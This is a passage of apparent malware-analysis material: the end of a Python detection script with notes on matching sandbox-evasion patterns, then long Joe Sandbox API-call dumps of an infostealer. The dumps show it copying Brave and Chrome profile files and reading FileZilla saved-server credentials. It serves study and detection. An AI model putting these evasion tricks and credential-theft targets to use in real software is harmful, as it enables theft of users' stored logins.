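• GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00301046
• VirtualAllocExNuma.KERNEL32(00000000), ref: 0030104D
• ExitProcess.KERNEL32 ref: 00301058
• VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0030106C
• VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003010AB
APIs
• lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003123D4
• lstrlen.KERNEL32(\*.*), ref: 0031240D
• lstrcat.KERNEL32(00000000,\*.*), ref: 00312436
• FindFirstFileA.KERNEL32(00000000,?), ref: 00312486
APIs
• lstrcat.KERNEL32(00000000,\*.*), ref: 0030199A
  • Part of subcall function 00324040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 0032406D
• FindFirstFileA.KERNEL32(00000000,?), ref: 00301B45
• StrCmpCA.SHLWAPI(?,003317A0), ref: 00301B70
• StrCmpCA.SHLWAPI(?,003317A4), ref: 00301B8A
• GetFileAttributesA.KERNEL32(00000000), ref: 00301F45
"""

if __name__ == "__main__":
    for ref, tags in analyse(SAMPLE).items():
        print(ref, ", ".join(tags) or "-")
```

Ordered matching matters here: a function that merely imports ExitProcess and VirtualAllocExNuma is unremarkable, while the NUMA allocation immediately followed by an exit path, as at 0030104D and 00301058, is the evasion pattern. The 0x17C841C0 (399,000,000 byte) VirtualAlloc is likewise only meaningful together with the VirtualFree of the same size that follows it, so the rules report the size rather than just the API name.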
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DBC1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DBE4
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DBEF
                                  • lstrlen.KERNEL32(00334CA8), ref: 0030DBFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC17
                                  • lstrcat.KERNEL32(00000000,00334CA8), ref: 0030DC23
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DC4C
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DC8F
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DCBF
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 0030DCD0
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0030DCF0
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 0030DD0A
                                  • lstrlen.KERNEL32(0032CFEC), ref: 0030DD1D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030DD47
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DD70
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DD7B
                                  • lstrlen.KERNEL32(00331794), ref: 0030DD86
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDA3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DDAF
                                  • lstrlen.KERNEL32(?), ref: 0030DDBC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DDDF
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030DDED
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DE19
                                  • lstrlen.KERNEL32(00331794), ref: 0030DE3D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DE6F
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DE7B
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DE8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DEB0
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DEBB
                                  • lstrlen.KERNEL32(00331794), ref: 0030DEC6
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030DEE6
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DEF2
                                  • lstrlen.KERNEL32(01028800), ref: 0030DF01
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF27
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DF32
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DF5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFA5
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030DFB1
                                  • lstrlen.KERNEL32(01028B40), ref: 0030DFC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030DFE9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030DFF4
                                  • lstrlen.KERNEL32(00331794), ref: 0030DFFF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E022
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 0030E02E
                                  • lstrlen.KERNEL32(01028800), ref: 0030E03D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E063
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0030E06E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E09A
                                  • StrCmpCA.SHLWAPI(?,Brave), ref: 0030E0CD
                                  • StrCmpCA.SHLWAPI(?,Preferences), ref: 0030E0E7
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E11F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0030E12E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E155
                                  • lstrcat.KERNEL32(00000000,?), ref: 0030E15D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E19F
                                  • lstrcat.KERNEL32(00000000), ref: 0030E1A9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E1D0
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E1F9
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E22F
                                  • lstrlen.KERNEL32(01028990), ref: 0030E23D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E261
                                  • lstrcat.KERNEL32(00000000,01028990), ref: 0030E269
                                  • lstrlen.KERNEL32(\Brave\Preferences), ref: 0030E274
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E29B
                                  • lstrcat.KERNEL32(00000000,\Brave\Preferences), ref: 0030E2A7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E2CF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E30F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E349
                                  • DeleteFileA.KERNEL32(?), ref: 0030E381
                                  • StrCmpCA.SHLWAPI(?,0102CB40), ref: 0030E3AB
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E3F4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E41C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E445
                                  • StrCmpCA.SHLWAPI(?,01028800), ref: 0030E468
                                  • StrCmpCA.SHLWAPI(?,01028B40), ref: 0030E47D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E4D9
                                  • GetFileAttributesA.KERNEL32(00000000), ref: 0030E4E0
                                  • StrCmpCA.SHLWAPI(?,0102CA80), ref: 0030E58E
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0030E5C4
                                  • CopyFileA.KERNEL32(00000000,?,00000001), ref: 0030E639
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E678
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E6A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E6C7
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E70E
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E737
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E75C
                                  • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0030E776
                                  • DeleteFileA.KERNEL32(?), ref: 0030E7D2
                                  • StrCmpCA.SHLWAPI(?,01028960), ref: 0030E7FC
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E88C
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E8B5
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E8EE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0030E916
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0030E952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$File$CopyDelete$AttributesFindFirst
                                  • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                                  • API String ID: 2635522530-726946144
                                  • Opcode ID: a069b476683f6738ebd7e2108bd299229fb4f2b7b62024c80283089324ab3e10
                                  • Instruction ID: a5a82309669412ff12d767980e4d55ef90f70ffd36209d4146b1c02a5a3cfc57
                                  • Opcode Fuzzy Hash: a069b476683f6738ebd7e2108bd299229fb4f2b7b62024c80283089324ab3e10
                                  • Instruction Fuzzy Hash: 3F927671A122169BCB22EFB4DC99AAF77B9AF54300F054528F805AB391DF74DC49CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003118D2
                                  • lstrlen.KERNEL32(\*.*), ref: 003118DD
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003118FF
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 0031190B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311932
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 00311947
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 00311967
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00311981
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003119BF
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003119F2
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00311A1A
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311A25
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311A4C
                                  • lstrlen.KERNEL32(00331794), ref: 00311A5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311A80
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311A8C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311AB4
                                  • lstrlen.KERNEL32(?), ref: 00311AC8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311AE5
                                  • lstrcat.KERNEL32(00000000,?), ref: 00311AF3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B19
                                  • lstrlen.KERNEL32(010288C0), ref: 00311B2F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B59
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311B64
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311B8F
                                  • lstrlen.KERNEL32(00331794), ref: 00311BA1
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311BC3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311BCF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311BF8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C25
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311C30
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C57
                                  • lstrlen.KERNEL32(00331794), ref: 00311C69
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311C8B
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311C97
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311CC0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311CEF
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311CFA
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D21
                                  • lstrlen.KERNEL32(00331794), ref: 00311D33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D55
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311D61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311D8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311DB9
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00311DC4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311DED
                                  • lstrlen.KERNEL32(00331794), ref: 00311E19
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311E36
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311E42
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311E68
                                  • lstrlen.KERNEL32(0102CA98), ref: 00311E7E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311EB2
                                  • lstrlen.KERNEL32(00331794), ref: 00311EC6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311EE3
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311EEF
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F15
                                  • lstrlen.KERNEL32(0102D468), ref: 00311F2B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F5F
                                  • lstrlen.KERNEL32(00331794), ref: 00311F73
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311F90
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00311F9C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00311FC2
                                  • lstrlen.KERNEL32(0101B2E8), ref: 00311FD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312000
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 0031200B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312036
                                  • lstrlen.KERNEL32(00331794), ref: 00312048
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312067
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00312073
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312098
                                  • lstrlen.KERNEL32(?), ref: 003120AC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003120D0
                                  • lstrcat.KERNEL32(00000000,?), ref: 003120DE
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312103
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031213F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0031214E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00312176
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00312181
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                                  • String ID: \*.*
                                  • API String ID: 712834838-1173974218
                                  • Opcode ID: c2c317d2864fd3335179f58c153c16f68df28ddc47a3777e52427942049f0198
                                  • Instruction ID: c4f3e3ce4bf334950db33cf92613df71300f4f98d240796ed2c3e689bc92e54b
                                  • Opcode Fuzzy Hash: c2c317d2864fd3335179f58c153c16f68df28ddc47a3777e52427942049f0198
                                  • Instruction Fuzzy Hash: 9662A070A126169BCB27AF68DC8CAEF77B9AF58700F050124F905AB290DF34DD59DB90
                                  APIs
                                  • wsprintfA.USER32 ref: 0031392C
                                  • FindFirstFileA.KERNEL32(?,?), ref: 00313943
                                  • StrCmpCA.SHLWAPI(?,003317A0), ref: 0031396C
                                  • StrCmpCA.SHLWAPI(?,003317A4), ref: 00313986
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 003139BF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003139E7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 003139F2
                                  • lstrlen.KERNEL32(00331794), ref: 003139FD
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A1A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313A26
                                  • lstrlen.KERNEL32(?), ref: 00313A33
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A53
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313A61
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313A8A
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00313ACE
                                  • lstrlen.KERNEL32(?), ref: 00313AD8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B05
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313B10
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B36
                                  • lstrlen.KERNEL32(00331794), ref: 00313B48
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B6A
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313B76
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313B9E
                                  • lstrlen.KERNEL32(?), ref: 00313BB2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313BD2
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313BE0
                                  • lstrlen.KERNEL32(01028990), ref: 00313C0B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313C31
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313C3C
                                  • lstrlen.KERNEL32(010288C0), ref: 00313C5E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313C84
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313C8F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313CB7
                                  • lstrlen.KERNEL32(00331794), ref: 00313CC9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313CE8
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313CF4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313D1A
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00313D47
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313D52
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313D79
                                  • lstrlen.KERNEL32(00331794), ref: 00313D8B
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313DAD
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313DB9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313DE2
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E11
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313E1C
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E43
                                  • lstrlen.KERNEL32(00331794), ref: 00313E55
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313E77
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313E83
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313EAC
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313EDB
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00313EE6
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F0D
                                  • lstrlen.KERNEL32(00331794), ref: 00313F1F
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F41
                                  • lstrcat.KERNEL32(00000000,00331794), ref: 00313F4D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313F75
                                  • lstrlen.KERNEL32(?), ref: 00313F89
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313FA9
                                  • lstrcat.KERNEL32(00000000,?), ref: 00313FB7
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00313FE0
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 0031401F
                                  • lstrlen.KERNEL32(0102CBA0), ref: 0031402E
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00314056
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00314061
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 0031408A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 003140CE
                                  • lstrcat.KERNEL32(00000000), ref: 003140DB
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 003142D9
                                  • FindClose.KERNEL32(00000000), ref: 003142E8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                                  • String ID: %s\*.*
                                  • API String ID: 1006159827-1013718255
                                  • Opcode ID: 41fd7f59895cc167d0deb303e856a4cb08cead48eefb3d68a0fb97a36f19e1dc
                                  • Instruction ID: 1771d68582f7b54b0b066474d3317ea5a2cfcfe296a16a111a6ea809bf7dd282
                                  • Opcode Fuzzy Hash: 41fd7f59895cc167d0deb303e856a4cb08cead48eefb3d68a0fb97a36f19e1dc
                                  • Instruction Fuzzy Hash: A9628371A116169BCB27AFA8DC8DAEF77B9AF58300F054124F805A7290DF74DE49CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316995
                                  • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 003169C8
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A02
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A29
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00316A34
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A5D
                                  • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00316A77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316A99
                                  • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00316AA5
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316AD0
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00316B00
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00316B35
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316B9D
                                  • lstrcpy.KERNEL32(00000000,0032CFEC), ref: 00316BCD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2086745606.0000000000301000.00000040.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                  • Associated: 00000000.00000002.2086730917.0000000000300000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000337000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.000000000038E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000396000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.00000000003AF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086745606.0000000000538000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086884601.000000000054A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.000000000054C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000006D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007B5000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007DC000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007E6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2086896727.00000000007F4000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087168142.00000000007F5000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087266241.0000000000992000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2087278151.0000000000993000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_300000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 313953988-555421843
                                  • Opcode ID: 403e1928d20d47975eb38e17d6f264f0d803963cff67c0c89d901ac785421fa2
                                  • Instruction ID: 269df959e44116d3f817345e8d59fd391c8b9995f190f8989e0cf1890afc8510
                                  • Opcode Fuzzy Hash: 403e1928d20d47975eb38e17d6f264f0d803963cff67c0c89d901ac785421fa2
                                  • Instruction Fuzzy Hash: D242A270A11216ABCB17ABB4DC9EAEF77B9AF18700F055414F801EB291DF74D945CBA0
